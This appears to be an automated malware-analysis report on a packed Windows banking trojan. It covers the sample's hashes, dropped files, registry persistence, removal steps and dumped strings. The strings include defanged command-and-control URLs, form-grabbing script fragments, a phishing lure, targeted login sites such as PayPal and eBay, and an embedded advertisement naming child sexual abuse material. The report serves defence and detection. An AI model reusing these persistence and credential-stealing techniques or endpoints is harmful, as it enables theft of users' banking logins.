HEUR:Trojan.Win32.Generic (Kaspersky), GenPack:Generic.Malware.SYd!g.49851E96 (B) (Emsisoft), GenPack:Generic.Malware.SYd!g.49851E96 (AdAware), Trojan-Spy.Win32.Qukart.FD, BankerGeneric.YR (Lavasoft MAS)Behaviour: Trojan-Spy, Banker, Trojan, Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0778d6b0c6f2050acb6eaf8fdbe57d12
SHA1: af58630b1d7296e1208d97fa47a786484985472e
SHA256: e056cd9afcf111bfab4157806a2dd1e3668542ca3e3b45c5015cea709d1678bb
SSDeep: 768:ZfYyzXvXNw2GgG/EtGs9JuPRMdXlowSEYJY5zx GZtt8H/iw08X/1H5:VHb/Nw7gWEtIadVBhmf5089
Size: 51712 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2024-04-18 22:06:08
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan-Spy. Spy program intended for stealing user's confidential data.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The GenPack creates the following process(es):
%original file name%.exe:2844
The GenPack injects its code into the following process(es):
Kjicmmcl.exe:2796
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process Kjicmmcl.exe:2796 makes changes in the file system.
The GenPack creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ldpneonc.htm (221 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bkmmeqjl.htm (552 bytes)
%System%\surf.dat (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cjcgngof.htm (207 bytes)
The GenPack deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ldpneonc.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bkmmeqjl.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cjcgngof.htm (0 bytes)
The process %original file name%.exe:2844 makes changes in the file system.
The GenPack creates and/or writes to the following file(s):
%System%\Ohpdhf32.dll (6 bytes)
%System%\Kjicmmcl.exe (102 bytes)
Registry activity
The process Kjicmmcl.exe:2796 makes changes in the system registry.
The GenPack creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 15 8E 82 C0 55 5E 25 DD 0A D1 63 87 53 F4 A5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1601" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1601" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1601" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1601" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess]
"BrowseNewProcess" = "yes"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1601" = "0"
The process %original file name%.exe:2844 makes changes in the system registry.
The GenPack creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 27 27 4F 4F 3A A5 76 47 0B 70 83 CC A2 30 C1"
[HKCR\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32]
"(Default)" = "%System%\Ohpdhf32.dll"
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"Web Event Logger" = "{79FEACFF-FFCE-815E-A900-316290B5B738}"
Dropped PE files
| MD5 | File path |
|---|---|
| 3f17822b7526b58f1c18a4f5c62e7531 | c:\WINDOWS\system32\Kjicmmcl.exe |
| 5103118072cc7fd7c801e0747e9977e0 | c:\WINDOWS\system32\Ohpdhf32.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:2844
- Delete the original GenPack file.
- Delete or disinfect the following files created/modified by the GenPack:
%Documents and Settings%\%current user%\Local Settings\Temp\ldpneonc.htm (221 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bkmmeqjl.htm (552 bytes)
%System%\surf.dat (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cjcgngof.htm (207 bytes)
%System%\Ohpdhf32.dll (6 bytes)
%System%\Kjicmmcl.exe (102 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe" = "%System%\ctfmon.exe" - Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 32428 | 32768 | 4.9306 | f537d294ff3c5892eac246be2ddef3e2 |
| .bss | 36864 | 136112 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .data | 176128 | 12752 | 12800 | 4.18685 | 7d657d7d2cc8c83204ceb9c4e7c3e40d |
| .idata | 192512 | 3748 | 4096 | 3.5204 | 708cff90e55fcc1f43ce49fc7ad6f7f4 |
| .aciof | 196608 | 4096 | 512 | 1.55733 | 5feef8bafc608bebf63c900b04113e75 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
The GenPack connects to the servers at the folowing location(s):
Strings from Dumps
Kjicmmcl.exe_2796:
.text
.text
.data
.data
.idata
.idata
.aciof
.aciof
%System%\dnkk.dll
%System%\dnkk.dll
%System%\surf.dat
%System%\surf.dat
%System%\kk32.dll
%System%\kk32.dll
%System%\kk32.vxd
%System%\kk32.vxd
%System%
%System%
hXXp://crutop.nu/index.php
hXXp://crutop.nu/index.php
hXXp://crutop.ru/index.php
hXXp://crutop.ru/index.php
hXXp://mazafaka.ru/index.php
hXXp://mazafaka.ru/index.php
hXXp://color-bank.ru/index.php
hXXp://color-bank.ru/index.php
hXXp://asechka.ru/index.php
hXXp://asechka.ru/index.php
hXXp://trojan.ru/index.php
hXXp://trojan.ru/index.php
hXXp://fuck.ru/index.php
hXXp://fuck.ru/index.php
hXXp://goldensand.ru/index.php
hXXp://goldensand.ru/index.php
hXXp://filesearch.ru/index.php
hXXp://filesearch.ru/index.php
hXXp://devx.nm.ru/index.php
hXXp://devx.nm.ru/index.php
hXXp://ros-neftbank.ru/index.php
hXXp://ros-neftbank.ru/index.php
hXXp://lovingod.host.sk/index.php
hXXp://lovingod.host.sk/index.php
hXXp://VVV.redline.ru/index.php
hXXp://VVV.redline.ru/index.php
hXXp://cvv.ru/index.php
hXXp://cvv.ru/index.php
hXXp://hackers.lv/index.php
hXXp://hackers.lv/index.php
hXXp://fethard.biz/index.php
hXXp://fethard.biz/index.php
hXXp://ldark.nm.ru/index.htm
hXXp://ldark.nm.ru/index.htm
hXXp://gaz-prom.ru/index.htm
hXXp://gaz-prom.ru/index.htm
hXXp://promo.ru/index.htm
hXXp://promo.ru/index.htm
hXXp://potleaf.chat.ru/index.htm
hXXp://potleaf.chat.ru/index.htm
hXXp://kadet.ru/index.htm
hXXp://kadet.ru/index.htm
hXXp://cvv.ru/index.htm
hXXp://cvv.ru/index.htm
hXXp://crutop.nu/index.htm
hXXp://crutop.nu/index.htm
hXXp://crutop.ru/index.htm
hXXp://crutop.ru/index.htm
hXXp://mazafaka.ru/index.htm
hXXp://mazafaka.ru/index.htm
hXXp://xware.cjb.net/index.htm
hXXp://xware.cjb.net/index.htm
hXXp://konfiskat.org/index.htm
hXXp://konfiskat.org/index.htm
hXXp://parex-bank.ru/index.htm
hXXp://parex-bank.ru/index.htm
hXXp://kidos-bank.ru/index.htm
hXXp://kidos-bank.ru/index.htm
hXXp://kavkaz.ru/index.htm
hXXp://kavkaz.ru/index.htm
hXXp://fethard.biz/index.htm
hXXp://fethard.biz/index.htm
CRYPTKEY
CRYPTKEY
ntdll.dll
ntdll.dll
kernel32.dll
kernel32.dll
wsock32.dll
wsock32.dll
user32.dll
user32.dll
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
.edata
.edata
%s\%s
%s\%s
WinExec
WinExec
KERNEL32.DLL
KERNEL32.DLL
CRTDLL.DLL
CRTDLL.DLL
dll.dll
dll.dll
This KEWL STUFF was coded by V. V. PUPKIN, moderator of crutop.nu
This KEWL STUFF was coded by V. V. PUPKIN, moderator of crutop.nu
Welcome to our forum, Adult Web Masters! hXXp://crutop.nu
Welcome to our forum, Adult Web Masters! hXXp://crutop.nu
AWM, welcome to CRUTOP.NU - HARDCORE/CONTENT/CHILD PORNO/LOLITAS/RAPE
AWM, welcome to CRUTOP.NU - HARDCORE/CONTENT/CHILD PORNO/LOLITAS/RAPE
REAL CASH, REAL BITCHEZ - CRUTOP.NU
REAL CASH, REAL BITCHEZ - CRUTOP.NU
%s-%s
%s-%s
%s %s
%s %s
surf.dat
surf.dat
dnkk.dll
dnkk.dll
kk32.vxd
kk32.vxd
kk32.dll
kk32.dll
%s\%s.exe
%s\%s.exe
%s/Rtdx1%i.htm
%s/Rtdx1%i.htm
%s\Rtdx1%i.dat
%s\Rtdx1%i.dat
%s /C %s
%s /C %s
\command.com
\command.com
%s\command.pif
%s\command.pif
%s\cmd.exe
%s\cmd.exe
%s\cmd.pif
%s\cmd.pif
:u
:u
of fraud on our website, we are undertaking a period review of our member accounts.
of fraud on our website, we are undertaking a period review of our member accounts.
%ssetTimeout("x()",%u);
%ssetTimeout("x()",%u);
%sself.parent.location="%s";
%sself.parent.location="%s";
%s
%s
%s%u - Microsoft Internet Explorer
%s%u - Microsoft Internet Explorer
\Iexplore.exe
\Iexplore.exe
.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u
%ssetTimeout("z()",%u);
%ssetTimeout("z()",%u);
%sdocument.%s.submit();
%sdocument.%s.submit();
%s
%s
%s
%s
%s
%s
%s
%s%u%s
%s%u%s
%s
%s%c%c
%s%c%c
Web Event Logger
Web Event Logger
Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
CLSID\%s\InProcServer32
CLSID\%s\InProcServer32
%s\%s.dll
%s\%s.dll
{79FEACFF-FFCE-815E-A900-316290B5B738}
{79FEACFF-FFCE-815E-A900-316290B5B738}
TXT: '%s'
TXT: '%s'
%s %X%c
%s %X%c
%s FORM_%X
%s FORM_%X
.yahoo.com
.yahoo.com
webmail.juno.com
webmail.juno.com
my.juno.com/s/
my.juno.com/s/
.juno.com
.juno.com
.earthlink.
.earthlink.
signin.ebay.
signin.ebay.
.paypal.com
.paypal.com
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
GetWindowsDirectoryA
GetWindowsDirectoryA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
ole32.DLL
ole32.DLL
OLEAUT32.DLL
OLEAUT32.DLL
WININET.DLL
WININET.DLL
USER32.DLL
USER32.DLL
GDI32.DLL
GDI32.DLL
ADVAPI32.DLL
ADVAPI32.DLL
{9BA05972-F6A8-11CF-A442-00A0C90A8F39}
{9BA05972-F6A8-11CF-A442-00A0C90A8F39}